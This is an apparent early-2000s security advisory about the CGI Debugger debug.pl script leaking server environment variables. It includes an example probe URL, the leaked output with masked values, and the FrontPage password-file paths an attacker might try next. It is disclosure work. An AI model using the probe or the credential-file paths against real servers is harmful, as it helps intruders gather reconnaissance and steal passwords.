NeoErudition Technologies By: Lawrence Lavigne Vulnerabillity: CGI Debugger v1.0 Remote: YES Risk: HIGH I have not found any information on Packetstorm or Security-Focus about this issue but that is not to say it has not been addressed elsewhere. But for the security communities sake I will release what I can now. Enviroment Variables can be gleamed from a server running /cgi-bin/debug.pl by passing a bogus arguement to the script. Example: http://www.domain.com/cgi-bin/debug.pl/* will produce: DOCUMENT_ROOT "/usr/home17/dir/public_html" GATEWAY_INTERFACE "CGI/1.1" HTTP_ACCEPT "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, */*" HTTP_ACCEPT_ENCODING "gzip, deflate" HTTP_ACCEPT_LANGUAGE "en-us" HTTP_CONNECTION "Keep-Alive" HTTP_COOKIE "$1" HTTP_HOST "www.domain.com" HTTP_USER_AGENT "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" LOG_DIR "/usr/local/etc/httpd/log6/dir" PATH "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin" QUERY_STRING "" REMOTE_ADDR "XXX.XXX.XXX.XXX" REMOTE_PORT "3899" REQUEST_METHOD "GET" REQUEST_URI "/directory/cgi-bin/debug.pl/" REWRITE_ROOT "/usr/home17/dir/public_html" SCRIPT_FILENAME "/usr/home17/dir/public_html/directory/cgi-bin/" SCRIPT_NAME "/directory/cgi-bin/*" SCRIPT_URI "http://www.domain.com/directory/cgi-bin/debug.pl/" SCRIPT_URL "/directory/cgi-bin/debug.pl/*" SERVER_ADDR "XXX.XXX.XXX.XXX" SERVER_ADMIN "admin@domain.com" SERVER_NAME "www.domain.com" SERVER_PORT "80" SERVER_PROTOCOL "HTTP/1.1" SERVER_SIGNATURE "" SERVER_SOFTWARE "Apache/1.3 (Unix) mod_perl/1.27 PHP/4.2.2 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.10 OpenSSL/0.9.6e" UNIQUE_ID "PW1BEdH5k-4AAYO7Thw" CANNOT EXECUTE:: /usr/home17/dir/public_html/directory/cgi-bin/ NOTE: This servers IP, domain and other sensitive information has been omitted. Note the information provided about SERVER_SOFTWARE. Apache version 1.3 (Unix), wich an attacker may be aware that it has a remote vulnerabillity that will permit remote execution of arbituary commands. FrontPage 5.0.2.2510 may have no current known vulnerabillities but could tip off an attacker to check for varied Vermeer Technology Incorperated vti_pvt vulnerabillities such as /vti_pvt/service/pwd, /vti_pvt/administrators.pwd etc. Thankfully OpenSSL 0.9.6e does not suffer the arbituary code execution vulnerabillity but seems moot considering what information debug.pl may provide an attacker with. SERVER_SOFTWARE is not the only sensitive information being provided in this list by any means. A skilled intruder can make use of much else that is here wich I will not be detailed here. Furthermore, executing debug.pl without an argument prompts for a script to execute or debug. Example: http://www.domain.com/cgi-bin/debug.pl, will give the follow output: Usage: /directory/cgi-bin/debug.pl/script-to-run By the following information provided and mayhaps a quick audit, an intruder may be able to collect enough information to successfully guess any possible scripts to run debug.pl against. Possible Code Injection ? Heap Overflow ? NeoErudition Technologies Lawrence Lavigne administrator@neoerudition.net http://neoerudition.net